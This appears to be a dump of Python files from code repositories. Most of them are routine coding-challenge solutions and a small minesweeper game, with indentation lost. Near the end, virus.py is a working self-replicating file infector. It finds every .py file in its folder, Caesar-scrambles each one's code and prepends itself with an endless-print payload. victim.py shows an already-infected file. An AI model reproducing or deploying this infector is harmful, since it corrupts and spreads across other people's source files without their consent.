return root
vals = self.getInorder(root)
# create tree
ans = TreeNode()
head = ans
for i in vals:
head.right = TreeNode(i)
head = head.right
return ans.right
```
#### File: CodingChallenges/python3/insertion_sort_list.py
```python
from .model import ListNode
"""
Space : O(n)
Time : O(n**2)
"""
class Solution:
def insertionSortList(self, head: ListNode) -> ListNode:
if not head:
return head
mem = []
point = head
while point:
mem.append(point.val)
point = point.next
n = len(mem)
stack = []
for i in range(n):
stack.append(mem[i])
j = len(stack) - 1
while j > 0:
if stack[j] < stack[j-1]:
temp = stack[j-1]
stack[j-1] = stack[j]
stack[j] = temp
else:
break
j -= 1
ans = ListNode(stack[0])
p = ans
for i in range(1, len(stack)):
p.next = ListNode(stack[i])
p = p.next
return ans
```
#### File: CodingChallenges/python3/intersection_of_array.py
```python
class Solution:
def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:
if len(nums1) < len(nums2):
item1 = nums1
item2 = nums2
else:
item1 = nums2
item2 = nums1
credit = {}
for i in item2:
if i in credit:
credit[i] += 1
else:
credit[i] = 1
ans = []
for j in item1:
if j in credit:
if credit[j] > 0:
ans.append(j)
credit[j] -= 1
return ans
```
#### File: CodingChallenges/python3/jump_game.py
```python
class Solution:
def canJump(self, nums: List[int]) -> bool:
n = len(nums)
if n == 1:
return True
cred = 0
i = 0
while True:
cred = max(cred, nums[i])
if cred + i >= n-1:
return True
if cred == 0:
break
i += 1
cred -= 1
return False
```
#### File: CodingChallenges/python3/keyboard_row.py
```python
class Solution:
def findWords(self, words: List[str]) -> List[str]:
ans = []
truth = {
'q': 1,
'w': 1,
'e': 1,
'r': 1,
't': 1,
'y': 1,
'u': 1,
'i': 1,
'o': 1,
'p': 1,
'a': 2,
's': 2,
'd': 2,
'f': 2,
'g': 2,
'h': 2,
'j': 2,
'k': 2,
'l': 2,
'z': 3,
'x': 3,
'c': 3,
'v': 3,
'b': 3,
'n': 3,
'm': 3,
}
for item in words:
oneline = True
check = item.lower()
line = truth[check[0]]
for i in range(1, len(check)):
if truth[check[i]] != line:
oneline = False
if oneline:
ans.append(item)
return ans
```
#### File: CodingChallenges/python3/kth_largest_element_in_an_array.py
```python
class Solution:
def findKthLargest(self, nums: List[int], k: int) -> int:
return sorted(nums)[-k]
```
#### File: CodingChallenges/python3/letter_case_permutation.py
```python
class Solution:
def letterCasePermutation(self, S: str) -> List[str]:
def permute(S, path):
if len(S) == 0:
ans.append(path)
return
if S[0].isalpha():
permute(S[1:], path + S[0].upper())
permute(S[1:], path + S[0].lower())
else:
permute(S[1:], path + S[0])
ans = []
permute(S, '')
return ans
```
#### File: CodingChallenges/python3/linked_list_cycle_II.py
```python
from .model import ListNode
"""
Space : O(1)
Time : O(n)
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def detectCycle(self, head: ListNode) -> ListNode:
if not head:
return None
h1 = head
h2 = head
cyclical = True
while h1 or h2:
h1 = h1.next
h2 = h2.next
if h2:
h2 = h2.next
if not h2 or not h1:
cyclical = False
break
if h1.val == h2.val:
if h1.next.val == h2.next.val:
break
if not cyclical:
return None
point = head
while True:
if point.val == h1.val:
if point.next.val == h1.next.val:
return point
point = point.next
h1 = h1.next
```
#### File: CodingChallenges/python3/linked_list_cycle.py
```python
from .model import ListNode
"""
Space : O(1)
Time : O(n)
"""
class Solution:
def hasCycle(self, head: ListNode) -> bool:
        if not head:
            return False
h1 = head
h2 = head
while h1 or h2:
h1 = h1.next
h2 = h2.next
if h2:
h2 = h2.next
if not h2 or not h1:
return False
if h1.val == h2.val:
if h1.next.val == h2.next.val:
break
return True
```
#### File: CodingChallenges/python3/longest_increasing_subsequence.py
```python
from bisect import bisect_left
# Space : O(n)
# Time : O(n log n)
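# e.g. nums = [10, 9, 2, 5, 3, 7, 101, 18]: sub ends as [2, 3, 7, 18], so the answer is 4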
class Solution:
def lengthOfLIS(self, nums: List[int]) -> int:
sub = []
for num in nums:
i = bisect_left(sub, num)
if i == len(sub):
sub.append(num)
else:
sub[i] = num
return len(sub)
```
#### File: CodingChallenges/python3/longest_mountain_in_array.py
```python
class Solution:
def insertStack(self, stack: List[int], direction: str) -> List[int]:
if len(stack) > 0:
if stack[-1][0] == direction:
stack[-1][1] += 1
else:
stack.append([direction, 1])
else:
stack.append([direction, 1])
return stack
def longestMountain(self, A: List[int]) -> int:
"""
Personal Attempt
Space : O(n)
Time : O(n)
"""
ans = 0
n = len(A)
stack = []
for i in range(1, n):
if A[i] > A[i-1]:
stack = self.insertStack(stack, "u")
elif A[i] == A[i-1]:
stack = self.insertStack(stack, "s")
else:
stack = self.insertStack(stack, "d")
m = len(stack)
if m == 1:
return 0
for j in range(m-1):
c1, c2 = stack[j], stack[j+1]
if c1[0] == "u" and c2[0] == "d":
ans = max(ans, c1[1] + c2[1] + 1)
return ans
def longestMountain2(self, A: List[int]) -> int:
"""
Best Solution
Space : O(1)
Time : O(n)
"""
lastup = lastdown = ans = was = 0
for i in range(1, len(A)):
if A[i]-A[i-1] > 0:
lastdown = 0
lastup += 1
elif A[i]-A[i-1] < 0:
if lastup > 0:
was = lastup + 1
lastup = 0
lastdown += 1
if was > 0:
ans = max(ans, was+lastdown)
else:
lastdown = 0
lastup = 0
was = 0
return ans
```
#### File: CodingChallenges/python3/majority_element_2.py
```python
class Solution:
def majorityElement(self, nums: List[int]) -> List[int]:
ans = []
if len(nums) == 0:
return ans
hashmap = {}
N = len(nums)
for i in nums:
if i not in hashmap:
hashmap[i] = 1
else:
hashmap[i] += 1
for k, v in hashmap.items():
if v > int(N/3):
ans.append(k)
return ans
```
#### File: CodingChallenges/python3/max_area_of_island.py
```python
class Solution:
def crawl(self, grid, x, y):
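        # Flood fill: recursively visit 4-connected land cells, zeroing each one so it
        # is only counted once, and accumulate the island's area.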
def bfs(dx, dy):
nonlocal area
if grid[dy][dx] == 1:
area += 1
grid[dy][dx] = 0
elif grid[dy][dx] == 0:
return
for ax, ay in c:
if 0 <= dy + ay < row and 0 <= dx + ax < col:
if grid[dy+ay][dx+ax] == 1:
bfs(dx+ax, dy+ay)
row = len(grid)
col = len(grid[0])
c = [(0, 1), (0, -1), (1, 0), (-1, 0)]
area = 0
bfs(x, y)
return area
def maxAreaOfIsland(self, grid: List[List[int]]) -> int:
row = len(grid)
col = len(grid[0])
ans = 0
for y in range(row):
for x in range(col):
if grid[y][x] == 1:
ans = max(ans, self.crawl(grid, x, y))
return ans
```
#### File: CodingChallenges/python3/maximize_distance_to_closest_person.py
```python
class Solution:
def maxDistToClosest(self, seats: List[int]) -> int:
dist1, dist2 = 0, 0
temp1, temp2 = 0, 0
n = len(seats)
for i in range(n):
# forward
if seats[i] == 0:
temp1 += 1
dist1 = max(dist1, temp1)
else:
temp1 = 0
# backward
if seats[n-1-i] == 0:
temp2 += 1
dist2 = max(dist2, temp2)
else:
temp2 = 0
if dist1 % 2 == 1:
mid = (dist1+1) // 2
else:
mid = (dist1) // 2
return max(mid, temp1, temp2)
```
#### File: CodingChallenges/python3/maximum_depth_of_n-ary_tree.py
```python
from .model import NaryNode
# Space : O(n)
# Time : O(n)
class Solution:
def maxDepth(self, root: NaryNode) -> int:
if not root:
return 0
ans = 0
stack = [root]
while stack:
ans += 1
temp = []
for node in stack:
if node:
temp += node.children
stack = temp
return ans
```
#### File: CodingChallenges/python3/maximum_difference_between_node_and_ancestor.py
```python
from .model import TreeNode
"""
Space : O(n)
Time : O(n)
"""
class Solution:
def maxAncestorDiff(self, root: TreeNode) -> int:
if not root:
return 0
ans = 0
stack = [(root, 10**6, -1)]
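        # Each stack entry carries the min and max values seen on the root-to-node path;
        # at a leaf, the candidate answer is the absolute difference of the two.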
while stack:
node, minv, maxv = stack.pop()
minv = min(minv, node.val)
maxv = max(maxv, node.val)
if not node.left and not node.right:
ans = max(ans, abs(maxv - minv))
if node.left:
stack.append((node.left, minv, maxv))
if node.right:
stack.append((node.right, minv, maxv))
return ans
```
#### File: CodingChallenges/python3/maximum_product_of_word_lengths.py
```python
class Solution:
def maxProduct(self, words: List[str]) -> int:
def checkContainedKey(a, b):
for k in a.keys():
if k in b:
return True
return False
ans = 0
word_dicts = []
for word in words:
d = {}
m = len(word)
for letter in word:
d[letter] = 1
word_dicts.append(d)
n = len(word_dicts)
for i in range(n):
for j in range(i+1, n):
if not checkContainedKey(word_dicts[i], word_dicts[j]):
ans = max(ans, len(words[i]) * len(words[j]))
return ans
```
#### File: CodingChallenges/python3/min_cost_for_tickets.py
```python
class Solution:
def mincostTickets(self, days: List[int], costs: List[int]) -> int:
num = 366
one, seven, thirty = costs
dp = [0] * num
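        # dp[i] = minimum cost to cover all travel days up to day i; on a travel day,
        # take the cheapest of a 1-, 7-, or 30-day pass ending on that day.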
idx = 0
for i in range(1, num):
dp[i] = dp[i-1]
if i == days[idx]:
dp[i] = min(
one+dp[i-1 if i-1>0 else 0],
seven+dp[i-7 if i-7>0 else 0],
thirty+dp[i-30 if i-30>0 else 0]
)
if idx != len(days)-1:
idx += 1
else:
break
return dp[days[idx]]
```
#### File: CodingChallenges/python3/minesweeper.py
```python
import random
def spawnBombs(mines, row, col):
mines_coords = set()
while mines > 0:
y = random.randint(0, row-1)
x = random.randint(0, col-1)
if (x, y) not in mines_coords:
mines_coords.add((x, y))
mines -= 1
return mines_coords
def createBoard(row, col):
board = []
for i in range(row):
board.append(['O' for j in range(col)])
return board
def calculateBoard(row, col, mine_coords):
board = createBoard(row, col)
c = [(0, -1), (0, 1), (-1, 0), (1, 0),
(-1, -1), (-1, 1), (1, -1), (1, 1)]
for y in range(row):
for x in range(col):
if (x, y) in mine_coords:
board[y][x] = 'X'
for ax, ay in c:
if (0 <= x + ax < col) and (0 <= y + ay < row) and (x + ax, y + ay) not in mine_coords:
if board[y+ay][x+ax] == 'O':
board[y+ay][x+ax] = '1'
elif board[y+ay][x+ax].isdigit():
board[y+ay][x +
ax] = str(int(board[y+ay][x+ax])+1)
return board
def printBoard(board):
rows = len(board)
cols = len(board[0])
for y in range(rows+2):
if y == 0:
line = " "
for x in range(cols):
line += "{} ".format(x)
elif y == 1:
line = " "
for x in range(cols):
line += "= "
else:
line = "{} | ".format(y-2)
for x in range(cols):
line += "{} ".format(board[y-2][x])
print(line)
def openBoard(board, ans_board, x, y):
def dfs(dx, dy):
if board[dy][dx] == 'O':
if ans_board[dy][dx].isdigit():
board[dy][dx] = ans_board[dy][dx]
return board
board[dy][dx] = '_'
for ax, ay in c:
if (0 <= dx + ax < col) and (0 <= dy + ay < row):
dfs(dx + ax, dy + ay)
c = [(0, -1), (0, 1), (-1, 0), (1, 0),
(-1, -1), (-1, 1), (1, -1), (1, 1)]
row = len(board)
col = len(board[0])
dfs(x, y)
return board
def checkIsWin(board, mine_coords):
row = len(board)
col = len(board[0])
for y in range(row):
for x in range(col):
if board[y][x] == 'O' and (x, y) not in mine_coords:
return False
return True
def checkBoard(board, ans_board, mine_coords, x, y):
# hit mine
if (x, y) in mine_coords:
for bx, by in mine_coords:
board[by][bx] = 'X'
return board, "lose"
    # check if the coordinate has already been entered
    if board[y][x].isdigit() or board[y][x] == " ":
        print("coordinate {} {} has already been entered".format(x, y))
        print("please choose another coordinate")
return board, "continue"
# check for new hit
board = openBoard(board, ans_board, x, y)
# check if there's still coord to choose
# otherwise, player wins
isWin = checkIsWin(board, mine_coords)
if isWin:
return board, "win"
return board, "continue"
def playGame():
mines = 5
row = 5
col = 10
board = createBoard(row, col)
mine_coords = spawnBombs(mines, row, col)
ans_board = calculateBoard(row, col, mine_coords)
print(mine_coords)
printBoard(ans_board)
result = "continue"
while result == "continue":
printBoard(board)
print("Input coordinate (x y). example: 0 1")
user_input = input()
x, y = user_input.split(" ")
board, result = checkBoard(
board, ans_board, mine_coords, int(x), int(y))
if result == "win" or result == "lose":
printBoard(board)
return result
return result
if __name__ == "__main__":
print("===== MINESWEEPER =====")
print("1. Play game")
print("2. Quit")
print("Enter number: ")
action = input()
if action == '1':
result = playGame()
if result == "win":
print("CONRATULATIONS, YOU WIN!")
elif result == "lose":
print("YOU LOSE!")
```
#### File: CodingChallenges/python3/minimum_depth_of_binary_tree.py
```python
from .model import TreeNode
"""
Space : O(n)
Time : O(n)
"""
class Solution:
def minDepth(self, root: TreeNode) -> int:
if not root:
return 0
res = []
stack = [(root, 1)]
while stack:
node, ls = stack.pop()
if not node.left and not node.right:
res.append(ls)
if node.right:
stack.append((node.right, ls+1))
if node.left:
stack.append((node.left, ls+1))
return min(res)
```
#### File: CodingChallenges/python3/minimum_moves_to_equal_array_elements.py
```python
class Solution:
def minMoves(self, nums: List[int]) -> int:
min_num = min(nums)
ans = 0
for x in nums:
ans += x - min_num
return ans
```
#### File: CodingChallenges/python3/minimum_operations_to_reduce_x_to_zero.py
```python
class Solution:
def minOperations(self, nums: List[int], x: int) -> int:
longest = 0
n = len(nums)
k = sum(nums) - x
d = {}
d[0] = 0
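        # Removing a prefix and suffix that sum to x is equivalent to keeping the longest
        # middle subarray summing to sum(nums) - x; d maps each prefix sum to its end index.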
if k == 0:
return len(nums)
i, count = 0, 0
while i < n:
count += nums[i]
d[count] = i+1
if count - k in d:
longest = max(longest, i - d[count-k]+1)
i += 1
if longest > 0:
return n - longest
return -1
```
#### File: CodingChallenges/python3/minimum_unique_sum.py
```python
def getMinimumUniqueSum(arr):
ans = 0
dp = [0] * 7000
for i in arr:
dp[i] += 1
n = len(dp)
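    # Bucket-count each value, then carry duplicates up to the next value so each value
    # is used at most once; the minimum sum is the sum of the occupied buckets.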
for i in range(n-1):
if dp[i] > 1:
dp[i+1] += dp[i] - 1
dp[i] = 1
for j in range(n):
if dp[j] > 0:
ans += j
return ans
```
#### File: CodingChallenges/python3/mirror_reflection.py
```python
import math
class Solution:
def mirrorReflection(self, p: int, q: int) -> int:
"""
Personal Attempt
Space : O(1)
Time : O(n)
"""
# get Highest Common Factor
# T = O(log(ab))
g = math.gcd(p, q)
h, w = p, q
x, y = 0, 0
while True:
if x == w:
mx = -g
elif x == 0:
mx = g
if y == h:
my = -g
elif y == 0:
my = g
x += mx
y += my
if (x, y) == (q, 0):
return 0
if (x, y) == (q, p):
return 1
if (x, y) == (0, p):
return 2
def mirrorReflectionBest(self, p: int, q: int) -> int:
"""
Best Solution
Space : O(1)
Time : O(log(pq))
"""
g = math.gcd(p, q)
m, n = q // g, p // g
if n % 2 == 0:
return 2
return m % 2
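        # e.g. p=2, q=1: g=1, m=1, n=2; n is even, so the ray hits receptor 2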
```
#### File: CodingChallenges/python3/number_of_1_bits.py
```python
class Solution:
def hammingWeight(self, n: int) -> int:
ans = 0
binary = bin(n)[2:]
n = len(binary)
for i in binary:
if i == '1':
ans += 1
return ans
```
#### File: CodingChallenges/python3/number_of_longest_increasing_subsequence.py
```python
class Solution:
    def findNumberOfLIS(self, nums):
        N = len(nums)
        if N <= 1:
            return N
        lengths = [0] * N  # lengths[i] = longest increasing subsequence ending in nums[i]
        counts = [1] * N  # counts[i] = number of longest subsequences ending in nums[i]
        for j in range(N):
            for i in range(j):
                if nums[i] < nums[j]:
                    if lengths[i] >= lengths[j]:
                        lengths[j] = 1 + lengths[i]
                        counts[j] = counts[i]
                    elif lengths[i] + 1 == lengths[j]:
                        counts[j] += counts[i]
        longest = max(lengths)
        return sum(c for i, c in enumerate(counts) if lengths[i] == longest)
```
#### File: CodingChallenges/python3/partition_array_into_three_parts_with_equal_sum.py
```python
class Solution:
def canThreePartsEqualSum(self, arr: List[int]) -> bool:
mean = sum(arr) / 3
if mean % 1 > 0:
return False
mean = int(mean)
count = 0
subarr = 0
for i in arr:
count += i
if count == mean:
count = 0
subarr += 1
if subarr == 3:
return True
return False
```
#### File: CodingChallenges/python3/pascals_triangle.py
```python
class Solution:
def generate(self, numRows: int) -> List[List[int]]:
ans = []
for i in range(1, numRows+1):
temp = []
for j in range(1, i+1):
if (j == 1) or (j == i):
temp.append(1)
else:
temp.append(ans[i-2][j-2] + ans[i-2][j-1])
ans.append(temp)
return ans
```
#### File: CodingChallenges/python3/perfect_number.py
```python
import math
class Solution:
def checkPerfectNumber(self, num: int) -> bool:
if num <=1:
return False
total = 1
s, e = 2, math.ceil(math.sqrt(num))
while s < e:
if num % s == 0:
total += s
total += num // s
s += 1
return total == num
```
#### File: CodingChallenges/python3/permutations.py
```python
from itertools import permutations
# Space : O(n^2)
# Time : O(n!)
class Solution:
def permute(self, nums: List[int]) -> List[List[int]]:
res = []
perm = permutations(nums)
for p in perm:
res.append(list(p))
return res
```
#### File: CodingChallenges/python3/power_of_two.py
```python
class Solution:
def isPowerOfTwo(self, n: int) -> bool:
if n <= 0:
return False
ones = 0
binary = bin(n)[2:]
for i in binary:
if i == "1":
ones += 1
if ones == 1:
return True
return False
```
#### File: CodingChallenges/python3/range_sum_query_2d-immutable.py
```python
class NumArray:
def __init__(self, nums: List[int]):
self.arr = nums.copy()
def sumRange(self, i: int, j: int) -> int:
ans = 0
for idx in range(i, j+1):
ans += self.arr[idx]
return ans
# Your NumArray object will be instantiated and called as such:
# obj = NumArray(nums)
# param_1 = obj.sumRange(i,j)
```
#### File: CodingChallenges/python3/remove_covered_intervals.py
```python
class Solution:
def removeCoveredIntervals(self, intervals: List[List[int]]) -> int:
ans = 0
intervals.sort(key=lambda a: (a[0], -a[1]))
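        # Sorting by start ascending and end descending means a covered interval always
        # appears after its coverer, with an end no greater than the running max end.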
end = 0
for i, j in intervals:
if j > end:
ans += 1
end = max(end, j)
return ans
```
#### File: CodingChallenges/python3/remove_duplicates_from_sorted_array_II.py
```python
class Solution:
def removeDuplicates(self, nums: List[int]) -> int:
n = len(nums)
if n <= 2:
return n
i = 0
while i < len(nums) - 2:
while nums[i] == nums[i+2]:
nums.pop(i)
if i >= len(nums)-2:
break
i += 1
return len(nums)
```
#### File: CodingChallenges/python3/remove_linked_list_elements.py
```python
from .model import ListNode
"""
Space : O(1)
Time : O(n)
"""
class Solution:
def deleteNode(self, head, key):
temp = head
while temp:
if temp.val == key:
temp = temp.next
else:
break
head = temp
prev = head
while temp:
if temp.val == key:
prev.next = temp.next
else:
prev = temp
temp = temp.next
return head
def removeElements(self, head: ListNode, val: int) -> ListNode:
res = self.deleteNode(head, val)
return res
```
#### File: CodingChallenges/python3/reverse_words_in_a_string_iii.py
```python
class Solution:
def reverseWords(self, s: str) -> str:
l = s.split(" ")
for i in range(len(l)):
l[i] = l[i][::-1]
return " ".join(l)
```
#### File: CodingChallenges/python3/score_of_parentheses.py
```python
class Solution:
def scoreOfParentheses(self, S: str) -> int:
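        # A '()' pair nested inside d other pairs scores 2**d,
        # e.g. "(()(()))" -> 2**1 + 2**2 = 6.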
ans = 0
pwr = -1
isAdded = False
for l in S:
if l == "(":
pwr += 1
isAdded = False
else:
if not isAdded:
ans += 2 ** pwr
isAdded = True
pwr -= 1
return ans
```
#### File: CodingChallenges/python3/search_in_rotated_sorted_array_II.py
```python
class Solution:
def search(self, nums: List[int], target: int) -> bool:
if len(nums) == 0:
return False
s, e = 0, len(nums)-1
while s <= e:
mid = (s+e) // 2
if nums[mid] == target:
return True
# check left
if nums[s] < nums[mid]:
if nums[s] <= target < nums[mid]:
e = mid - 1
else:
s = mid + 1
elif nums[s] == nums[mid]:
s += 1
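                # duplicates make it ambiguous which half is sorted, so shrink by one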
# check right
else:
if nums[mid] < target <= nums[e]:
s = mid + 1
else:
e = mid - 1
return False
```
#### File: CodingChallenges/python3/search_insert_position.py
```python
class Solution:
def searchInsert(self, nums: List[int], target: int) -> int:
ans = 0
leng = len(nums)
for idx in range(leng):
if nums[idx] == target:
break
elif nums[idx] > target:
break
ans += 1
return ans
```
#### File: CodingChallenges/python3/short_encoding_of_words.py
```python
class Solution:
def minimumLengthEncoding(self, W: List[str]) -> int:
wset = set(W)
for word in W:
if word in wset:
for i in range(1, len(word)):
wset.discard(word[i:])
print(word, wset)
return len("#".join(list(wset))) + 1
```
#### File: CodingChallenges/python3/single_number_3.py
```python
class Solution:
def singleNumber(self, nums: List[int]) -> List[int]:
hashmap = {}
res = []
for i in nums:
if i in hashmap:
hashmap[i] += 1
else:
hashmap[i] = 1
for key, val in hashmap.items():
if val == 1:
res.append(key)
return res
```
#### File: CodingChallenges/python3/smallest_range_ii.py
```python
class Solution:
def smallestRangeII(self, A: List[int], K: int) -> int:
A.sort()
ans = A[-1] - A[0]
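        # After sorting, try each split point: add K to A[0..i] and subtract K from the rest;
        # the new extremes come from A[-1]-K, x+K (max) and A[0]+K, y-K (min).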
for x, y in zip(A, A[1:]):
ans = min(ans, max(A[-1]-K, x+K) - min(A[0]+K, y-K))
return ans
```
#### File: CodingChallenges/python3/smallest_string_with_a_given_numeric_value.py
```python
class Solution:
def getSmallestString(self, n: int, k: int) -> str:
"""
Personal Attempt
Space : O(1)
Time : O(n)
"""
zs = 0
while k - 26 >= n - 1:
zs += 1
k -= 26
n -= 1
mid = ''
if k > n:
mid = chr(96 + k - n + 1)
k = k - n + 1
n -= 1
return 'a' * n + mid + 'z' * zs
def getSmallestStringBest(self, n: int, k: int) -> str:
"""
Best solution
Math approach
Space : O(1)
Time : O(1)
"""
# let there be x 'a', and z 'z' and maybe another alphabet 'y'
# case 1: no need for y
# 1.x + 26.z = k
# x + z = n
# x + 26(n-x) = k
# 25x = 26n-k
# case 2: y is needed and it can be from 2 to 25
# 1.x + y + 26z = k
# x + z = n - 1 or z = n - 1 - x
# x + y + 26(n - 1 - x) = k
# -25x + y + 26n - 26 - k = 0
# 25x = 26n - k - 26 + y
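        # worked example: n=3, k=27 -> 26n-k=51 is not divisible by 25 (case 2);
        # temp=25, y=25-(25%25)=25 ('y'), x=(25+25)//25=2, giving 'aa'+'y' = 'aay' (1+1+25=27)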
if (26*n - k) % 25 == 0: # case 1
x = (26*n - k)//25
ans = 'a'*x + 'z'*(n-x)
else: # case 2
temp = 26*n - k - 26
if temp < 0:
x = 0
y = -temp
else:
y = 25-(temp % 25)
x = (temp+y)//25
ans = 'a'*x + chr(ord('a')-1+y) + 'z'*(n-1-x)
return ans
```
#### File: CodingChallenges/python3/squares_of_a_sorted_array.py
```python
class Solution:
def sortedSquares(self, nums: List[int]) -> List[int]:
temp1, temp2, ans = [], [], []
n = len(nums)
i = 0
while i < n:
if nums[i] < 0:
temp1.insert(0, nums[i] ** 2)
else:
temp2.append(nums[i] ** 2)
i += 1
if not temp1:
return temp2
elif not temp2:
return temp1
x, y = 0, 0
while x < len(temp1) and y < len(temp2):
if temp1[x] < temp2[y]:
ans.append(temp1[x])
x += 1
else:
ans.append(temp2[y])
y += 1
if x == len(temp1):
ans += temp2[y:]
if y == len(temp2):
ans += temp1[x:]
return ans
```
#### File: CodingChallenges/python3/strong_password.py
```python
import re
def minimumNumber(n, password):
# Return the minimum number of characters to make the password strong
ans = 0
low = re.findall("[a-z]", password)
if not low:
ans += 1
up = re.findall("[A-Z]", password)
if not up:
ans += 1
dig = re.findall("[0-9]", password)
if not dig:
ans += 1
spe = re.findall("[!@#$%^&*()\-+]", password)
if not spe:
ans += 1
if n + ans < 6:
return 6 - n
return ans
```
#### File: CodingChallenges/python3/sum_root_to_leaf_bin_tree.py
```python
from .model import TreeNode
class Solution:
def sumRootToLeaf(self, root: TreeNode) -> int:
# depth first search
def dfs(node, paths, curr):
if node is None:
return
if not node.left and not node.right:
paths.append(curr+str(node.val))
return
dfs(node.left, paths, curr+str(node.val))
dfs(node.right, paths, curr+str(node.val))
return paths
ans = 0
paths = []
dfs(root, paths, '')
if len(paths) > 0:
for i in paths:
ans += int(i, 2)
return ans
```
#### File: CodingChallenges/python3/teemo_attacking.py
```python
class Solution:
def findPoisonedDuration(self, timeSeries: List[int], duration: int) -> int:
if not timeSeries:
return 0
ans = 0
start = timeSeries[0]
end = timeSeries[0] + duration
for t in timeSeries[1:]:
if t < end:
end = t + duration
else:
ans += (end - start)
start = t
end = t + duration
ans += (end - start)
return ans
```
#### File: CodingChallenges/python3/the_kth_factor_of_n.py
```python
class Solution:
def kthFactor(self, n: int, k: int) -> int:
idx = 0
for i in range(1, n+1):
if n%i == 0:
idx += 1
if idx == k:
return i
return -1
```
#### File: CodingChallenges/python3/toeplitz_matrix.py
```python
class Solution:
def isToeplitzMatrix(self, matrix: List[List[int]]) -> bool:
if len(matrix) == 0:
return True
if len(matrix[0]) == 0:
return True
ly = len(matrix)
lx = len(matrix[0])
for y in range(ly-1):
for x in range(lx-1):
if matrix[y][x] != matrix[y+1][x+1]:
return False
return True
```
#### File: CodingChallenges/python3/unique_paths_obs.py
```python
class Solution:
def uniquePathsWithObstacles(self, obstacleGrid: List[List[int]]) -> int:
row = len(obstacleGrid)
col = len(obstacleGrid[0])
if (row == 1 and col == 1) and obstacleGrid[row-1][col-1] == 1:
return 0
if obstacleGrid[row-1][col-1] == 1:
return 0
# change obs to -1
for y in range(row):
for x in range(col):
if obstacleGrid[y][x] == 1:
obstacleGrid[y][x] = -1
for i in range(row):
for j in range(col):
if obstacleGrid[i][j] == 0:
if i == 0 and j == 0:
obstacleGrid[i][j] = 1
elif i == 0:
left = obstacleGrid[i][j-1] if obstacleGrid[i][j-1] != -1 else 0
obstacleGrid[i][j] = left
elif j == 0:
top = obstacleGrid[i-1][j] if obstacleGrid[i-1][j] != -1 else 0
obstacleGrid[i][j] = top
else:
top = obstacleGrid[i-1][j]
left = obstacleGrid[i][j-1]
if top == -1:
top = 0
if left == -1:
left = 0
obstacleGrid[i][j] = top + left
print(obstacleGrid)
return obstacleGrid[row-1][col-1] if obstacleGrid[row-1][col-1] != -1 else 0
```
#### File: CodingChallenges/python3/unique_paths.py
```python
class Solution:
def uniquePaths(self, m: int, n: int) -> int:
grid = []
for _ in range(n):
grid.append([0]*m)
for row in range(n):
for col in range(m):
if row == 0:
grid[row][col] = 1
elif col == 0:
grid[row][col] = 1
else:
grid[row][col] = grid[row-1][col] + grid[row][col-1]
return grid[n-1][m-1]
```
#### File: CodingChallenges/python3/valid_anagram.py
```python
class Solution:
def isAnagram(self, s: str, t: str) -> bool:
s = sorted(s)
t = sorted(t)
return s == t
```
#### File: CodingChallenges/python3/validate_stack_sequences.py
```python
class Solution:
def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool:
n = len(pushed)
stack = []
i, j = 0, 0
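        # Greedily push from `pushed` and pop whenever the stack top matches the next value
        # in `popped`, e.g. pushed=[1,2,3,4,5], popped=[4,5,3,2,1] -> True.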
while i < n or stack:
if stack and stack[-1] == popped[j]:
stack.pop()
j += 1
elif i < n:
stack.append(pushed[i])
i += 1
else:
return False
return True
```
#### File: CodingChallenges/python3/valid_palindrome.py
```python
class Solution:
def isPalindrome(self, s: str) -> bool:
s_cp = s.replace(" ", "").lower()
clean_s = ''
for l in s_cp:
# check if num
if ord(l) >= 48 and ord(l) <= 57:
clean_s += l
elif ord(l) >= 97 and ord(l) <= 122:
clean_s += l
return clean_s == clean_s[::-1]
```
#### File: CodingChallenges/python3/vowel_cons_anagram.py
```python
def get_factorial(n):
res = 1
for i in range(1, n+1):
res *= i
return res
def get_con_div(hashmap):
res = 1
for key, val in hashmap.items():
if key not in ['A', 'E', 'I', 'O', 'U']:
res *= get_factorial(val)
return res
def get_vow_div(hashmap):
res = 1
for key, val in hashmap.items():
if key in ['A', 'E', 'I', 'O', 'U']:
res *= get_factorial(val)
return res
def solution(S):
vow = 0
con = 0
hashmap = {}
for l in S:
if l in ['A', 'E', 'I', 'O', 'U']:
vow += 1
else:
con += 1
if l not in hashmap:
hashmap[l] = 1
else:
hashmap[l] += 1
if con - vow not in [0, 1]:
return 0
# print(vow, con, hashmap)
res_con = (get_factorial(con)) / get_con_div(hashmap)
res_vow = (get_factorial(vow)) / get_vow_div(hashmap)
return int(res_con * res_vow) % 1000000007
res = solution("BOLOBOLO")
print("res : {}".format(res))
``` |
{
"source": "joshiarheinier/pyscript",
"score": 3
} |
#### File: pyscript/simple-virus-script/victim.py
```python
def prankPrint():
while True:
print(";slvrBlt;")
prankPrint()
l = 10
zkloh l > 1:
zkloh l%2==0:
sulqw(l*l)
l -=1
l = 10
zkloh l > 1:
zkloh l%2==0:
sulqw(l*l)
l -=1
l = 10
zkloh l > 1:
zkloh l%2==0:
sulqw(l*l)
l -=1
l = 10
zkloh l > 1:
zkloh l%2==0:
sulqw(l*l)
l -=1
l = 10
zkloh l > 1:
zkloh l%2==0:
sulqw(l*l)
l -=1
l = 10
zkloh l > 1:
zkloh l%2==0:
sulqw(l*l)
l -=1
ghi wublqj(d):
iru l lq udqjh(d):
blhog l+3
d=wublqj(5)
i = 10
while i > 1:
while i%2==0:
print(i*i)
i -=1
i = 10
while i > 1:
while i%2==0:
print(i*i)
i -=1
i = 10
while i > 1:
while i%2==0:
print(i*i)
i -=1
i = 10
while i > 1:
while i%2==0:
print(i*i)
i -=1
i = 10
while i > 1:
while i%2==0:
print(i*i)
i -=1
i = 10
while i > 1:
while i%2==0:
print(i*i)
i -=1
def trying(a):
for i in range(a):
yield i+3
a=trying(5)
```
#### File: pyscript/simple-virus-script/virus.py
```python
def prankPrint(): #Make the 'injected stamp' function
while True:
print(";slvrBlt;")
#damned
import glob
from string import *
target = glob.glob("*.py") #Search for other python script
for each in target:
host = open(each,'r')
hostcode = host.read()
if hostcode.find(";slvrBlt;") == -1:
vir_str = ''
for string in hostcode: #Create the virus by crypting/changing its text
if 64< ord(string) < 120:
encrypt = chr(ord(string)+3)
elif 119 < ord(string) < 123:
encrypt = chr(ord(string)+3-26)
else: encrypt = string
vir_str += encrypt
host = open(each,'w')
virus = open(__file__,'r')
tmp = virus.read()
tmp = tmp[:tmp.find("#damned")]+'prankPrint()'
mybody = tmp+chr(10)+vir_str+chr(10)+hostcode
virus.close()
host.write(mybody) #injecting the virus
``` |
{
"source": "joshiarheinier/Python-Keylogger-Linux-",
"score": 3
} |
